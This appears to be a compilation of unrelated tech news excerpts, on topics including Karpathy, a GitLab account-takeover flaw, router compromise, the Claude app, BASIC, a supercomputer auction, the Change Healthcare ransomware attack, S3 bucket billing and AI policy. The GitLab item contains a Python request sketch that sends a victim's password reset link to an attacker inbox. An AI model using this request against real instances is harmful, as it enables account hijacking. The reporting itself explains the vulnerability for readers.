
On Thursday, renowned AI researcher Andrej Karpathy, formerly of OpenAI and Tesla, tweeted a lighthearted proposal that large language models (LLMs) like the one that runs ChatGPT could one day be modified to operate in or be transmitted to space, potentially to communicate with extraterrestrial life. He said the idea was “just for fun,” but given his influential profile in the field, it may inspire others in the future.

Karpathy’s bona fides in AI almost speak for themselves: he received a PhD from Stanford under computer scientist Dr. Fei-Fei Li in 2015, became one of the founding members of OpenAI as a research scientist, and served as senior director of AI at Tesla between 2017 and 2022. In 2023, Karpathy rejoined OpenAI for a year, leaving this past February. He has posted several highly regarded tutorials covering AI concepts on YouTube, and whenever he talks about AI, people listen.

Most recently, Karpathy has been working on a project called “llm.c” that implements the training process for OpenAI’s 2019 GPT-2 LLM in pure C, dramatically speeding up the process and demonstrating that working with LLMs doesn’t necessarily require complex development environments. The project’s streamlined approach and concise codebase sparked Karpathy’s imagination.


A maximum severity vulnerability that allows hackers to hijack GitLab accounts with no user interaction required is now under active exploitation, federal government officials warned as data showed that thousands of users had yet to install a patch released in January.

A change GitLab implemented in May 2023 made it possible for users to initiate password changes through links sent to secondary email addresses. The move was designed to permit resets when users didn’t have access to the email address used to establish the account. In January, GitLab disclosed that the feature allowed attackers to send reset emails to accounts they controlled and from there click on the embedded link and take over the account.
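
Public proof-of-concept write-ups described the flaw as the password-reset endpoint accepting an array of email addresses, so a reset link for the victim’s account could also be mailed to an attacker-controlled inbox. The following is a hedged sketch of that reported request shape in Python; the host and addresses are hypothetical.

    # Hedged sketch of the reported CVE-2023-7028 request shape: the reset
    # endpoint accepted an array of email addresses, mailing the victim's
    # reset link to every address listed. Host and addresses are hypothetical.
    import requests

    resp = requests.post(
        "https://gitlab.example.com/users/password",    # hypothetical instance
        data=[
            ("user[email][]", "victim@example.com"),    # account owner
            ("user[email][]", "attacker@example.com"),  # attacker-controlled inbox
        ],
        timeout=10,
    )
    print(resp.status_code)  # a 2xx response meant both addresses got the link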

While exploits require no user interaction, hijackings work only against accounts that aren’t configured to use multifactor authentication. Even with MFA, accounts remain vulnerable to password resets, but the attackers are ultimately unable to access the account, allowing the rightful owner to change the reset password. The vulnerability, tracked as CVE-2023-7028, carries a severity rating of 10 out of a possible 10.


Cybercriminals and spies working for nation-states are surreptitiously coexisting inside the same compromised name-brand routers, using the devices to disguise attacks motivated by both financial gain and strategic espionage, researchers said.

In some cases, the coexistence is peaceful, as financially motivated hackers provide spies with access to already compromised routers in exchange for a fee, researchers from security firm Trend Micro reported Wednesday. In other cases, hackers working in nation-state-backed advanced persistent threat groups take control of devices previously hacked by the cybercrime groups. Sometimes the devices are independently compromised multiple times by different groups. The result is a free-for-all inside routers and, to a lesser extent, VPN devices and virtual private servers provided by hosting companies.

“Cybercriminals and Advanced Persistent Threat (APT) actors share a common interest in proxy anonymization layers and Virtual Private Network (VPN) nodes to hide traces of their presence and make detection of malicious activities more difficult,” Trend Micro researchers Feike Hacquebord and Fernando Merces wrote. “This shared interest results in malicious internet traffic blending financial and espionage motives.”

[Image: The Claude AI iOS app running on an iPhone. Credit: Anthropic]

On Wednesday, Anthropic announced the launch of an iOS mobile app for its Claude 3 AI language models, which are similar to OpenAI’s ChatGPT. It also introduced a new subscription tier designed for group collaboration. Before the app launch, Claude was only available through a website, an API, and other apps that integrated Claude through that API.

Like the ChatGPT app, Claude’s new mobile app serves as a gateway to chatbot interactions, and it also allows uploading photos for analysis. While it’s only available on Apple devices for now, Anthropic says that an Android app is coming soon.

Anthropic rolled out the Claude 3 large language model (LLM) family in March, featuring three different model sizes: Claude Opus, Claude Sonnet, and Claude Haiku. Currently, the app utilizes Sonnet for regular users and Opus for Pro users.
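
For a sense of the API route mentioned above, here is a minimal sketch using Anthropic’s official Python client; it assumes an ANTHROPIC_API_KEY environment variable, and the model ID shown is the Sonnet-tier identifier from the Claude 3 launch, which may have changed since.

    # Minimal sketch of calling Claude 3 through Anthropic's Python client.
    # Assumes ANTHROPIC_API_KEY is set in the environment; the model ID is
    # the Sonnet identifier from the March launch and may have changed.
    import anthropic

    client = anthropic.Anthropic()

    message = client.messages.create(
        model="claude-3-sonnet-20240229",  # Sonnet serves regular users; Opus serves Pro
        max_tokens=256,
        messages=[{"role": "user", "content": "Hello, Claude."}],
    )
    print(message.content[0].text)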

[Image: Part of the cover illustration from “The Applesoft Tutorial” BASIC manual that shipped with the Apple II computer starting in 1981. Credit: Apple, Inc.]

Sixty years ago, on May 1, 1964, at 4 am, a quiet revolution in computing began at Dartmouth College. That’s when mathematicians John G. Kemeny and Thomas E. Kurtz successfully ran the first program written in their newly developed BASIC (Beginner’s All-Purpose Symbolic Instruction Code) programming language on the college’s General Electric GE-225 mainframe.

Little did they know that their creation would go on to democratize computing and inspire generations of programmers over the next six decades.

What is BASIC?

In its most traditional form, BASIC is an interpreted programming language that runs line by line, with line numbers. A typical program might look something like this:
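
    10 PRINT "HELLO, WORLD!"
    20 INPUT "WHAT IS YOUR NAME? "; N$
    30 FOR I = 1 TO 3
    40 PRINT "NICE TO MEET YOU, "; N$
    50 NEXT I
    60 END

(A representative sketch in the classic Microsoft-style dialect; exact syntax varied slightly between machines.) The line numbers double as both execution order and editing handles: to change a program, you retype a line with the same number, and RUN starts from the lowest.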

[Image: A photo of the Cheyenne supercomputer, which is now up for auction. Credit: US General Services Administration]

On Tuesday, the US General Services Administration began an auction for the decommissioned Cheyenne supercomputer, located in Cheyenne, Wyoming. The 5.34-petaflop supercomputer ranked as the 20th most powerful in the world at the time of its installation in 2016. Bidding started at $2,500, but its price is currently $27,643, with the reserve not yet met.

The supercomputer, which officially operated between January 12, 2017, and December 31, 2023, at the NCAR-Wyoming Supercomputing Center, was a powerful and energy-efficient system that significantly advanced atmospheric and Earth system sciences research.

“In its lifetime, Cheyenne delivered over 7 billion core-hours, served over 4,400 users, and supported nearly 1,300 NSF awards,” writes the University Corporation for Atmospheric Research (UCAR) on its official Cheyenne information page. “It played a key role in education, supporting more than 80 university courses and training events. Nearly 1,000 projects were awarded for early-career graduate students and postdocs. Perhaps most tellingly, Cheyenne-powered research generated over 4,500 peer-review publications, dissertations and theses, and other works.”


Change Healthcare, the health care services provider whose recent ransomware attack hamstrung the US prescription market for two weeks, was hacked through a compromised account that lacked multifactor authentication, the company’s CEO told members of Congress.

The February 21 attack by a ransomware group using the names ALPHV or BlackCat took down a nationwide network Change Healthcare administers to allow healthcare providers to manage customer payments and insurance claims. With no easy way for pharmacies to calculate what costs were covered by insurance companies, payment processors, providers, and patients experienced long delays in filling prescriptions for medicines, many of which were lifesaving. Change Healthcare has also reported that hackers behind the attacks obtained personal health information for a “substantial portion” of the US population.

Standard defense not in place

Andrew Witty, CEO of Change Healthcare parent company UnitedHealth Group, said the breach started on February 12 when hackers somehow obtained an account password for a portal allowing remote access to employee desktop devices. The account, Witty admitted, failed to use multifactor authentication (MFA), a standard defense against password compromises that requires additional authentication in the form of a one-time password or physical security key.
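
For readers unfamiliar with the mechanics, here is a minimal sketch of the one-time-password flavor of MFA using the pyotp library; the secret is generated on the spot purely for illustration.

    # Minimal sketch of a TOTP one-time password, the kind of second factor
    # described above, using the pyotp library. Real deployments provision
    # the secret once (often via QR code) and keep it server-side.
    import pyotp

    secret = pyotp.random_base32()  # illustrative; never reuse a published secret
    totp = pyotp.TOTP(secret)

    code = totp.now()               # six digits, rotates every 30 seconds
    print(code, totp.verify(code))  # the server-side check -> True

Even a stolen password is useless without the current code, which is why the missing MFA mattered so much here.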

[Image: Be careful with the buckets you put out there for anybody to fill. Credit: Getty Images]

If you’re using Amazon Web Services and your S3 storage bucket can be reached from the open web, you’d do well not to pick a generic name for that space. Avoid “example,” skip “change_me,” don’t even go with “foo” or “bar.” Someone else with the same “change this later” thinking can cost you a MacBook’s worth of cash.

Ask Maciej Pocwierz, who just happened to pick an S3 name that “one of the popular open-source tools” used for its default backup configuration. After setting up the bucket for a client project, he checked his billing page and found nearly 100 million unauthorized attempts to create new files on his bucket (PUT requests) within one day. The bill was over $1,300 and counting.

[Image: Nothing, nothing, nothing, nothing, nothing … nearly 100 million unauthorized requests. Credit: Maciej Pocwierz]

“All this actually happened just a few days after I ensured my client that the price for AWS services will be negligible, like $20 at most for the entire month,” Pocwierz wrote over chat. “I explained the situation is very unusual but it definitely looked as if I didn’t know what I’m doing.”
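
The defensive takeaway is twofold: randomize bucket names so nobody else’s default configuration can point at them, and block anonymous access outright. Below is a minimal boto3 sketch along those lines, assuming configured AWS credentials; the name prefix and region are hypothetical.

    # Minimal defensive sketch with boto3, assuming AWS credentials are set
    # up; the name prefix and region are hypothetical. A random suffix keeps
    # the bucket name out of anyone's default config, and the public-access
    # block turns away anonymous requests (though, as this story shows, S3
    # billed even for denied requests at the time).
    import secrets
    import boto3

    REGION = "eu-central-1"
    s3 = boto3.client("s3", region_name=REGION)

    bucket = f"myproject-backups-{secrets.token_hex(8)}"
    s3.create_bucket(
        Bucket=bucket,
        CreateBucketConfiguration={"LocationConstraint": REGION},
    )
    s3.put_public_access_block(
        Bucket=bucket,
        PublicAccessBlockConfiguration={
            "BlockPublicAcls": True,
            "IgnorePublicAcls": True,
            "BlockPublicPolicy": True,
            "RestrictPublicBuckets": True,
        },
    )
    print("created", bucket)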


On Sunday, word began to spread on social media about a new mystery chatbot named “gpt2-chatbot” that appeared in the LMSYS Chatbot Arena. Some people speculate that it may be a secret test version of OpenAI’s upcoming GPT-4.5 or GPT-5 large language model (LLM). The paid version of ChatGPT is currently powered by GPT-4 Turbo.

Currently, the new model is only available for use through the Chatbot Arena website, although in a limited way. In the site’s “side-by-side” arena mode where users can purposely select the model, gpt2-chatbot has a rate limit of eight queries per day—dramatically limiting people’s ability to test it in detail.

So far, gpt2-chatbot has inspired plenty of rumors online, including that it could be the stealth launch of a test version of GPT-4.5 or even GPT-5—or perhaps a new version of 2019’s GPT-2 that has been trained using new techniques. We reached out to OpenAI for comment but did not receive a response by press time. On Monday evening, OpenAI CEO Sam Altman seemingly dropped a hint by tweeting, “i do have a soft spot for gpt2.”


On Friday, the US Department of Homeland Security announced the formation of an Artificial Intelligence Safety and Security Board that consists of 22 members pulled from the tech industry, government, academia, and civil rights organizations. But given the nebulous nature of the term “AI,” which can apply to a broad spectrum of computer technology, it’s unclear if this group will even be able to agree on what exactly they are safeguarding us from.

President Biden directed DHS Secretary Alejandro Mayorkas to establish the board, which will meet for the first time in early May and subsequently on a quarterly basis.

The fundamental assumption underlying the board’s existence, and reflected in Biden’s AI executive order from October, is that AI is an inherently risky technology and that American citizens and businesses need to be protected from its misuse. Along those lines, the goal of the group is to help guard against foreign adversaries using AI to disrupt US infrastructure; develop recommendations to ensure the safe adoption of AI tech into transportation, energy, and Internet services; foster cross-sector collaboration between government and businesses; and create a forum where AI leaders can share information on AI security risks with the DHS.
